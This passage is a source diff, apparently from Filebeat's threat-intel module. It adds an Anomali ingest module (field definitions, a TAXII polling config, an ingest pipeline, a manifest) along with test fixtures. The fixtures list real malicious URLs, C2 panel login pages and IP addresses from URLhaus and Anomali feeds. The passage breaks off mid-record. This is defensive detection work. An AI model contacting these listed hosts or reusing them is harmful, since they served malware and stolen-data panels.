"https://urlhaus.abuse.ch/url/961456/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 33463, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:39.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://cxminute.com/minu/TSNLSN58H30G912H/uk.gif", + "threatintel.indicator.url.path": "/minu/TSNLSN58H30G912H/uk.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961457/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 33833, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "letonguesc.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:39.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "letonguesc.com", + "threatintel.indicator.url.extension": "gif", + "threatintel.indicator.url.original": "https://letonguesc.com/leto/08658331007/blank.gif", + "threatintel.indicator.url.path": "/leto/08658331007/blank.gif", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961450/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 34205, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "cxminute.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "cxminute.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://cxminute.com/minu/01098910324/blank.png", + "threatintel.indicator.url.path": "/minu/01098910324/blank.png", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961451/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 34573, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/02794390233/uk.css", + "threatintel.indicator.url.path": "/viro/02794390233/uk.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961452/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 34940, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "css", + "threatintel.indicator.url.original": "https://univirtek.com/viro/CSTDNT69D63F754D/en.css", + "threatintel.indicator.url.path": "/viro/CSTDNT69D63F754D/en.css", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961453/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 35312, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://univirtek.com/viro/GSTGNE91B06L219W/1x1.jpg", + "threatintel.indicator.url.path": "/viro/GSTGNE91B06L219W/1x1.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961454/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 35685, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "univirtek.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:37.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "univirtek.com", + "threatintel.indicator.url.extension": "jpg", + "threatintel.indicator.url.original": "https://univirtek.com/viro/03610140125/map.jpg", + "threatintel.indicator.url.path": "/viro/03610140125/map.jpg", + "threatintel.indicator.url.scheme": "https" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.abuseurl", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.reference": "https://urlhaus.abuse.ch/url/961448/", + "event.type": "indicator", + "fileset.name": "abuseurl", + "input.type": "log", + "log.offset": 36053, + "service.type": "threatintel", + "tags": [ + "threatintel-abuseurls", + "forwarded" + ], + "threatintel.abuseurl.blacklists.spamhaus_dbl": "not listed", + "threatintel.abuseurl.blacklists.surbl": "not listed", + "threatintel.abuseurl.larted": false, + "threatintel.abuseurl.tags": [ + "sLoad" + ], + "threatintel.abuseurl.threat": "malware_download", + "threatintel.abuseurl.url_status": "offline", + "threatintel.indicator.domain": "belfetproduction.com", + "threatintel.indicator.first_seen": "2021-01-14T20:49:36.000Z", + "threatintel.indicator.provider": "Cryptolaemus1", + "threatintel.indicator.type": "url", + "threatintel.indicator.url.domain": "belfetproduction.com", + "threatintel.indicator.url.extension": "png", + "threatintel.indicator.url.original": "https://belfetproduction.com/bella/CRRLRD74E09A462T/blank.png", + "threatintel.indicator.url.path": "/bella/CRRLRD74E09A462T/blank.png", + "threatintel.indicator.url.scheme": "https" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml b/x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml new file mode 100644 index 000000000000..69ab6e22e9ba --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/_meta/fields.yml @@ -0,0 +1,53 @@ +- name: anomali + type: group + description: > + Fields for Anomali Threat Intel + fields: + - name: id + type: keyword + description: > + The ID of the indicator. + - name: name + type: keyword + description: > + The name of the indicator. + - name: pattern + type: keyword + description: > + The pattern ID of the indicator. + - name: valid_from + type: date + description: > + When the indicator was first found or is considered valid. + - name: modified + type: date + description: > + When the indicator was last modified + - name: labels + type: keyword + description: > + The labels related to the indicator + - name: indicator + type: keyword + description: > + The value of the indicator, for example if the type is domain, this would be the value. + - name: description + type: keyword + description: > + A description of the indicator. + - name: title + type: keyword + description: > + Title describing the indicator. + - name: content + type: keyword + description: > + Extra text or descriptive content related to the indicator. + - name: type + type: keyword + description: > + The indicator type, can for example be "domain, email, FileHash-SHA256". + - name: object_marking_refs + type: keyword + description: > + The STIX reference object. \ No newline at end of file diff --git a/x-pack/filebeat/module/threatintel/anomali/config/config.yml b/x-pack/filebeat/module/threatintel/anomali/config/config.yml new file mode 100644 index 000000000000..f266fe17ff96 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/config/config.yml @@ -0,0 +1,63 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +auth.basic.user: {{ .username }} +auth.basic.password: {{ .password }} + +request.method: GET +{{ if .ssl }} + - request.ssl: {{ .ssl | tojson }} +{{ end }} +request.url: {{ .url }} +request.redirect.forward_headers: true +request.transforms: +- set: + target: header.Content-Type + value: application/vnd.oasis.taxii+json +- set: + target: header.Accept + value: application/vnd.oasis.taxii+json +- set: + target: header.Range + value: items 0-10000 +- set: + target: url.params.match[type] + value: {{ .types }} +- set: + target: url.params.added_after + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "2006-01-02T15:04:05.999Z" ]]' + +response.split: + target: body.results + +cursor: + timestamp: + value: '[[ .last_response.header.Get "X-TAXII-Date-Added-Last" ]]' + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + document_id: id + target: json + - add_fields: + target: '' + fields: + ecs.version: 1.6.0 diff --git a/x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml b/x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml new file mode 100644 index 000000000000..0f16b62643a6 --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/ingest/pipeline.yml @@ -0,0 +1,131 @@ +description: Pipeline for parsing Anomali Threat Intel +processors: + +#################### +# Event ECS fields # +#################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: enrichment +- set: + field: event.category + value: threat +- set: + field: event.type + value: indicator + +###################### +# General ECS fields # +###################### +- rename: + field: json + target_field: threatintel.anomali + ignore_missing: true + +##################### +# Threat ECS Fields # +##################### +## File indicator operations +- date: + field: threatintel.anomali.created + formats: + - "yyyy-MM-dd'T'HH:mm:ss.SSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSZ" + - "yyyy-MM-dd'T'HH:mm:ss.SSSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" + if: "ctx?.threatintel?.anomali?.created != null" +- date: + field: threatintel.anomali.modified + target_field: threatintel.anomali.modified + formats: + - "yyyy-MM-dd'T'HH:mm:ss.SSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSZ" + - "yyyy-MM-dd'T'HH:mm:ss.SSSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" + if: "ctx?.threatintel?.anomali?.created != null" +- date: + field: threatintel.anomali.valid_from + target_field: threatintel.anomali.valid_from + formats: + - "yyyy-MM-dd'T'HH:mm:ss.SSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSZ" + - "yyyy-MM-dd'T'HH:mm:ss.SSSz" + - "yyyy-MM-dd'T'HH:mm:ss.SSSZ" + if: "ctx?.threatintel?.anomali?.created != null" +- grok: + field: threatintel.anomali.pattern + patterns: + - "^\\[%{DATA:_tmp.threattype}:value%{SPACE}=%{SPACE}'%{DATA:_tmp.threatvalue}'\\]" +- rename: + field: _tmp.threattype + target_field: threatintel.indicator.type + ignore_missing: true +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.ip + ignore_missing: true + if: "['ipv4-addr', 'ipv6-addr'].contains(ctx?.threatintel?.indicator?.type)" +- uri_parts: + field: _tmp.threatvalue + target_field: threatintel.indicator.url + keep_original: true + remove_if_successful: true + if: ctx?.threatintel?.indicator?.type == 'url' +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.url.full + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'url' && ctx?.threatintel?.indicator?.url?.original == null +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.email.address + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'email-addr' +- rename: + field: _tmp.threatvalue + target_field: threatintel.indicator.domain + ignore_missing: true + if: ctx?.threatintel?.indicator?.type == 'domain-name' +- set: + field: threatintel.indicator.type + value: unknown + if: ctx?.threatintel?.indicator?.type == null +###################### +# Cleanup processors # +###################### +- script: + lang: painless + if: ctx?.threatintel != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); +- remove: + field: + - threatintel.anomali.created + - message + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/x-pack/filebeat/module/threatintel/anomali/manifest.yml b/x-pack/filebeat/module/threatintel/anomali/manifest.yml new file mode 100644 index 000000000000..83836cfdd19b --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/manifest.yml @@ -0,0 +1,20 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: interval + default: 60m + - name: ssl + - name: types + default: indicators + - name: username + - name: password + - name: url + default: "https://otx.alienvault.com/api/v1/indicators/export" + - name: tags + default: [threatintel-otx, forwarded] + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log new file mode 100644 index 000000000000..28d5b256ea9e --- /dev/null +++ b/x-pack/filebeat/module/threatintel/anomali/test/anomali_limo.ndjson.log @@ -0,0 +1,642 @@ +{"created":"2020-01-22T02:58:57.431Z","description":"TS ID: 55241332361; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--44c85d4f-45ca-4977-b693-c810bbfb7a28","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:58:57.431Z","name":"mal_url: http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work6/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.431Z"} +{"created":"2020-01-22T02:58:57.503Z","description":"TS ID: 55241332307; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9fe5c81-6869-4247-af81-62b7c8aba209","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:58:57.503Z","name":"mal_url: http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/lewis/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:58:57.503Z"} +{"created":"2020-01-22T02:58:57.57Z","description":"TS ID: 55241332302; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--b0e14122-9005-4776-99fc-00872476c6d1","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-22T02:58:57.57Z","name":"mal_url: http://f0387770.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0387770.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:58:57.57Z"} +{"created":"2020-01-22T02:58:59.366Z","description":"TS ID: 55241332312; iType: mal_url; State: active; Org: Digital Ocean; Source: CyberCrime","id":"indicator--111ec76f-616d-4aa8-80fd-e11ef0066aba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-50"],"modified":"2020-01-22T02:58:59.366Z","name":"mal_url: http://178.62.187.103/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://178.62.187.103/login']","type":"indicator","valid_from":"2020-01-22T02:58:59.366Z"} +{"created":"2020-01-22T02:58:59.457Z","description":"TS ID: 55241332386; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--189ce776-6d7e-4e85-9222-de5876644988","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T02:58:59.457Z","name":"mal_url: http://appareluea.com/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:58:59.457Z"} +{"created":"2020-01-22T02:59:06.402Z","description":"TS ID: 55241332391; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--a4144d34-b86d-475e-8047-eb46b48ee325","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T02:59:06.402Z","name":"mal_url: http://nkpotu.xyz/Kpot3/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot3/login.php']","type":"indicator","valid_from":"2020-01-22T02:59:06.402Z"} +{"created":"2020-01-22T02:59:19.99Z","description":"TS ID: 55241332372; iType: mal_ip; State: active; Org: Unified Layer; Source: CyberCrime","id":"indicator--983d9c3d-b7f8-4345-b643-b1d18e6ac6b2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-49"],"modified":"2020-01-22T02:59:19.99Z","name":"mal_ip: 162.144.128.116","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '162.144.128.116']","type":"indicator","valid_from":"2020-01-22T02:59:19.99Z"} +{"created":"2020-01-22T02:59:20.155Z","description":"TS ID: 55241332313; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--f9c6386b-dba2-41f9-8160-d307671e5c8e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-01-22T02:59:20.155Z","name":"mal_url: http://ntrcgroup.com/nze/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ntrcgroup.com/nze/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:20.155Z"} +{"created":"2020-01-22T02:59:25.521Z","description":"TS ID: 55241332350; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--98fad53e-5389-47f7-a3ff-44d334af2d6b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T02:59:25.521Z","name":"mal_url: http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work8/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T02:59:25.521Z"} +{"created":"2020-01-22T02:59:25.626Z","description":"TS ID: 55241332291; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--76c01735-fb76-463d-9609-9ea3aedf3f4f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T02:59:25.626Z","name":"mal_url: http://f0390764.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0390764.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:25.626Z"} +{"created":"2020-01-22T02:59:36.461Z","description":"TS ID: 55241332343; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--e0a812dc-63c8-4949-b038-2241b2dbfcdc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-22T02:59:36.461Z","name":"mal_ip: 45.143.138.39","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.143.138.39']","type":"indicator","valid_from":"2020-01-22T02:59:36.461Z"} +{"created":"2020-01-22T02:59:41.193Z","description":"TS ID: 55241332316; iType: mal_url; State: active; Org: Sksa Technology Sdn Bhd; Source: CyberCrime","id":"indicator--6f0d8607-21cb-4738-9712-f4fd91a37f7d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-22T02:59:41.193Z","name":"mal_url: http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aglfreight.com.my/inc/js/jstree/biu/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T02:59:41.193Z"} +{"created":"2020-01-22T02:59:41.228Z","description":"TS ID: 55241332284; iType: mal_url; State: active; Org: Oltelecom Jsc; Source: CyberCrime","id":"indicator--c649d6d4-87c4-4b76-bfc2-75a509ccb187","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:41.228Z","name":"mal_url: http://95.182.122.184/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://95.182.122.184/']","type":"indicator","valid_from":"2020-01-22T02:59:41.228Z"} +{"created":"2020-01-22T02:59:51.313Z","description":"TS ID: 55241332337; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--408ebd2d-063f-4646-b2e7-c00519869736","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-22T02:59:51.313Z","name":"mal_ip: 198.54.115.121","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '198.54.115.121']","type":"indicator","valid_from":"2020-01-22T02:59:51.313Z"} +{"created":"2020-01-22T02:59:51.372Z","description":"TS ID: 55241332324; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--e1d215cb-c7a5-40e0-bc53-8f92a2bcaba8","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-38"],"modified":"2020-01-22T02:59:51.372Z","name":"mal_ip: 192.185.119.172","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '192.185.119.172']","type":"indicator","valid_from":"2020-01-22T02:59:51.372Z"} +{"created":"2020-01-22T02:59:51.442Z","description":"TS ID: 55241332296; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime","id":"indicator--6f3a4a2b-62e3-48ef-94ae-70103f09cf7e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-61"],"modified":"2020-01-22T02:59:51.442Z","name":"mal_url: http://f0389246.xsph.ru/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://f0389246.xsph.ru/login']","type":"indicator","valid_from":"2020-01-22T02:59:51.442Z"} +{"created":"2020-01-22T03:00:01.563Z","description":"TS ID: 55241332400; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--213519c9-f511-4188-89c8-159f35f08008","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-01-22T03:00:01.563Z","name":"mal_url: http://appareluea.com/server/cp.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://appareluea.com/server/cp.php']","type":"indicator","valid_from":"2020-01-22T03:00:01.563Z"} +{"created":"2020-01-22T03:00:03.138Z","description":"TS ID: 55241332396; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--5a563c85-c528-4e33-babe-2dcff34f73c4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-22T03:00:03.138Z","name":"mal_url: http://nkpotu.xyz/Kpot2/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nkpotu.xyz/Kpot2/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.138Z"} +{"created":"2020-01-22T03:00:03.396Z","description":"TS ID: 55241332363; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f3e33aab-e2af-4c15-8cb9-f008a37cf986","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:00:03.396Z","name":"mal_url: http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work5/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.396Z"} +{"created":"2020-01-22T03:00:03.642Z","description":"TS ID: 55241332320; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--f03f098d-2fa9-49e1-a7dd-02518aa105fa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-22T03:00:03.642Z","name":"mal_url: http://mecharnise.ir/ca4/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mecharnise.ir/ca4/panel/admin.php']","type":"indicator","valid_from":"2020-01-22T03:00:03.642Z"} +{"created":"2020-01-22T03:00:27.534Z","description":"TS ID: 55241332367; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--e72e3ba0-7de5-46bb-ab1e-efdf3e0a0b3b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-22T03:00:27.534Z","name":"mal_url: http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://chol.cc/Work4/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:27.534Z"} +{"created":"2020-01-22T03:00:27.591Z","description":"TS ID: 55241332317; iType: mal_url; State: active; Org: SoftLayer Technologies; Source: CyberCrime","id":"indicator--d6b59b66-5020-4368-85a7-196026856ea9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-78"],"modified":"2020-01-22T03:00:27.591Z","name":"mal_url: http://kironofer.com/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kironofer.com/webpanel/login.php']","type":"indicator","valid_from":"2020-01-22T03:00:27.591Z"} +{"created":"2020-01-22T03:00:45.787Z","description":"TS ID: 55241332309; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime","id":"indicator--aff7b07f-acc7-4bec-ab19-1fce972bfd09","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-68"],"modified":"2020-01-22T03:00:45.787Z","name":"mal_url: http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://worldatdoor.in/panel2/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-22T03:00:45.787Z"} +{"created":"2020-01-22T03:00:45.841Z","description":"TS ID: 55241332286; iType: mal_url; State: active; Org: Garanntor-Hosting; Source: 